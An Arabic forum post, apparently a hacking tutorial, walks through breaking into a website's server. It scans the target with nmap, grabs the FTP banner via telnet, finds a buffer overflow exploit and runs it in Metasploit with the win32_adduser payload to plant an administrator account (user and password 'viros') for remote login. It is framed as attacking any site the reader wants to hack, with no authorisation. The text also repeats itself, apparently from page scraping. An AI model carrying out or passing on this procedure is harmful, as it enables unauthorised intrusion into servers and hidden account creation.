شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت بسم الله الرحمن الرحيم السلام عليكم و رحمة الله و بركاته أقدم لكم شرح الاختراق المتقدم و هي طريقة الأختراق الأحترافيه طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند..... و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه و اللي منها طريقتنا اليوم و هي الأختراق عن طريق البرامج المركبه على السيرفر أو الموقع حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع ول من لم يظهر له الشرح فليحمله من هنا : تحميل الشرح مع الصور بصيغة HTML اللي راح تتعلمه من الشرح:- 1-استخدام أداة Nmap الشهيره. 2-التعامل مع أداة M e t a s ploit. 3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا. متطلبات الشرح:- 1-أداة Nmap 2-أداة M e t a spliot لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت نبدأ الشرح على بركة الله أمر البحث nmap -P0 http://www.site.com/ مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/ و زي ما نشوف البرامج المركبه على الموقع مع المنافذ الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره)) ابدأ=>تشغيل=>telnet نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21 21 منفذ الــFTP هنا طلع لنا اسم البرنامج الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه FTP port 21 Buffer Overflow Exploit و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm تاخذ الثغره للمسار هذا C:\Program Files\M e t a sploit\Framework2\home\framework\exploits و تروح الأن و تفتح أداة الميتا بالذهاب للمكان اللي ثبت الاداة فيه راح تلقاها باسم msfconsole.exe show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت) show options أمر اظهار الخيارات RHOST = الموقع RPORT = المنفذ أهم شئ هو الموقع أما المنفذ ماهو لازم set RHOST http://www.site.com/ امر اظافة الموقع و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت) show options أمر اظهار الخيارات RHOST = الموقع RPORT = المنفذ أهم شئ هو الموقع أما المنفذ ماهو لازم set RHOST http://www.site.com/ امر اظافة الموقع و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي set PASS viros اضافة الباسوورد viros set USER viros اضافة اليوزر viros شرح الأختراق المتقدم + استعمال اداة الميتا سبليوت بسم الله الرحمن الرحيم السلام عليكم و رحمة الله و بركاته أقدم لكم شرح الاختراق المتقدم و هي طريقة الأختراق الأحترافيه طبعا الكثير منا واجه بعض المشاكل و هو أنه لما يفحص السيرفر و الموقع و ما يلقى ثغرات انكلود او كوماند..... و بعض الشباب بترك الموقع و يمل من البحث و ما يكون عنده علم بالطرق الثانيه و اللي منها طريقتنا اليوم و هي الأختراق عن طريق البرامج المركبه على السيرفر أو الموقع حاولت أسهل المسأله و اصغر الشرح بقدر المستطاع ول من لم يظهر له الشرح فليحمله من هنا : تحميل الشرح مع الصور بصيغة HTML اللي راح تتعلمه من الشرح:- 1-استخدام أداة Nmap الشهيره. 2-التعامل مع أداة M e t a s ploit. 3-استغلال ثغرات Buffer Overflow المكتوبه بلغة الميتا. متطلبات الشرح:- 1-أداة Nmap 2-أداة M e t a spliot لا أحد يطلب مني رابط التحميل للادوات أبحتوا عنها في مواقع البحت نبدأ الشرح على بركة الله أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 642x463 وحجمها 60KB. أمر البحث nmap -P0 http://www.site.com/ مع وضع رابط الموقع المراد اختراقه بدل http://www.site.com/ و زي ما نشوف البرامج المركبه على الموقع مع المنافذ الحين نروح للتلنت ((غير مهم جدا و لكن لزيادة فرصه نجاح الثغره)) ابدأ=>تشغيل=>telnet نكتب أول شئ حرف o و انتر و بعدها نكتب الموقع و المنفذ مثل: site.com 21 21 منفذ الــFTP هنا طلع لنا اسم البرنامج الحين نروح نبحث عن ثغرات للبرنامج عن طريق محرك البحث بهذه الطريقه FTP port 21 Buffer Overflow Exploit و ممكن تزود بالاخير و تحط كلمة M e t a بدون فراغات علشان أنا ما راح اشرح استغلال الثغرات هاذي الا اللي بالميتا بعد ما نلقى الثغره نحفظها بس مو باي اسم تبغاه شوفوا الصوره هذا الأسم اللي تحفظ الثغره فيه و بامتداد pm تاخذ الثغره للمسار هذا C:\Program Files\M e t a sploit\Framework2\home\framework\exploits و تروح الأن و تفتح أداة الميتا بالذهاب للمكان اللي ثبت الاداة فيه راح تلقاها باسم msfconsole.exe show exploits امر اظهار الثغرات الموجوده و راح تلاحظ الثغرات كثيره و هي طبعا ثغرات محفوظه مع البرنامج أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 756x321 وحجمها 68KB. use تظيف بعده اسم الثغره اللي معك (هذا أمر استخدام الثغره اللي تحددها انت) show options أمر اظهار الخيارات RHOST = الموقع RPORT = المنفذ أهم شئ هو الموقع أما المنفذ ماهو لازم set RHOST http://www.site.com/ امر اظافة الموقع و نفس الشئ للمنفذ مع تعديل RHOST الى RPORT و تغيير الموقع الى المنفذ أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 657x285 وحجمها 57KB. show payloads أمر اظهار خيارات الثغره أو الأشياء اللي ممكن تنفذها الثغره و أهم شئ هو win32_adduser و هي لاضافة حساب رووت على السيرفر و هذا اللي راح اشرحه set PAYLOAD win32_adduser أمر استخدام هذا الخيار للثغره الحين لو تبي تشوف الخيارات show option راح تلقى انضاف أمر الثغره لأضافة حساب الرووت لكن مكان اليوزر و الباس فاضي نضيف اليوزر و الباس بالأوامر هاذي set PASS viros اضافة الباسوورد viros set USER viros اضافة اليوزر viros أضغط هنا لتكبير الصورة , مقاس الصورة الأصلي 680x268 وحجمها 40KB. اظهار الخيارات و راح نشوف ان المعلومات انحفظت exploit أمر الأستغلال و زي ما راح تشوفون ان فيه كلام راح يطلع زي اللي بالصوره و ان شاء الهل الثغره تظبط و بعد ما ينسجل حساب الرووت تروح تتصل بالسيرفر بأي برنامج اتصال زي برنامج putty سوف يتم شرحه باذن الله ======================== و الى هنا نكون وصلنا لنهاية الشرح أتمنى ان الشرح كان واضح و اذا فيه أي خطأ سامحوني عليه لان الأنسان غير معصوم من الخطأ و في الختام تقبلوا تحياتي
قوانين المنتدى
